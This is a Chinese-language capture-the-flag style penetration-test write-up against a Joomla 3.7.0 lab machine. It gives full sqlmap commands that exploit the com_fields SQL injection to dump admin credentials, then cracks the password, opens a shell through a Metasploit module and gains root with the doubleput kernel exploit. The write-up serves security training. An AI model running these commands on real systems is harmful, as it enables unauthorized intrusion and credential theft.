*概述*
*测试目的*
*测试范围*
| 序号 | 系统 | IP |
|---|---|---|
| 1 | 本地 | 192.168.152.128 |
| 2 | 靶机 | 192.168.152.133 |
*详细测试流程*
*1、发现测试目标*
*2、信息收集*
开放了80端口,是Joomla服务
扫描目录
利用joomscan工具探测服务版本
Joomscan工具利用方法:
https://cn.linux-console.net/?p=10704
Joomscan –url http://192.168.12.133
*3、漏洞利用*
搜索joomla 3.7.0版本漏洞,这里利用第一个sql注入的漏洞,用-m参数下载到本地目录
查看相关payload
-u参数指定url地址,--risk=3代表扫描的力度,--dbs列出所有的数据库,-p指定漏洞参数点https://blog.csdn.net/bua200720411091/article/details/133816482(sqlmap用法)
得到数据库,这里我们利用第二个
sqlmap -u "http://192.168.152.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --tables -D "joomladb"
得到了很多的表,我们用#_users表
sqlmap -u "http://192.168.152.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
得到字段
sqlmap -u "http://192.168.152.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" –C “username,password” --dump -p list[fullordering]
把密码保存到一个文件里面,用john破解密码
那么就知道admin的密码就是snoopy
登录后台http://192.168.152.133/administrator/
登录后台以后可以尝试寻找上传点上传木马文件。但是我们这里直接使用msf一步化到位
使用第6个
获得一个会话以后进入shell
使用python稳定化shell,获得交互式shell
msfconsole
search joomla
use 6
set rhosts 10.1.2.148
exploit
尝试suid提权
没有成功
尝试内核提权
searchsploit Ubuntu 16.04
-x参数是查看的意思,-m参数就是下载到本地
用wget下载
将下载的payload上传到目标上面
lpwd显示本地目录
upload file1 file2 将本地的file1上传到目标的当前目录下面并且可以重命名为file2
*4、提权*
上传完成以后解压
进入39772目录
解压exploit.tar ,用tar –xf命令
解压完成以后进入名字最长的那个目录
然后根据之前看到的用法
先运行compile.sh,在运行doubleput
根据运行结果可知,compile.sh就是对c文件进行批量编译的可执行文件
运行doubleput,过一会就可以获得root权限
获得最终的flag
*漏洞详情和修复建议*
| 风险评级 | |
|---|---|
| 漏洞描述:joomlaSQl注入 | High |
| 漏洞影响:泄露账号密码等敏感信息, | |
| 修复建议:加强过滤 |
| 风险评级 | |
|---|---|
| 漏洞描述:joomlaGetshell | High |
| 漏洞影响:被直接获取www-data权限甚至被提权 | |
| 修复建议:无 |
*测试结果综述*
先用nmap扫描发现80端口的joomla服务,接着用joomscan扫描获得后台地址以及服务版本,利用searchsploit搜素利用其中一个SQL注入漏洞获得管理员账号密码,在这个地方可以在templates/bezz3/html上传一个用msfvenom生成的php木马,然后做好监听可以获得一个反向shell,但是有更简单的方法,就是在msfconsole里面搜索joomla相关漏洞,利用sqli_rce那个可以一步到位获得一个www-data的shell.然后后面尝试了suid、sudo提权失败,利用/etc/issus文件信息获得内核版本,再次利用searchsploit搜素相关历史漏洞,最后下载payload,上传paylaod,几次解压,然后编译c文件,运行获得root权限
.assets/wps138.jpg)
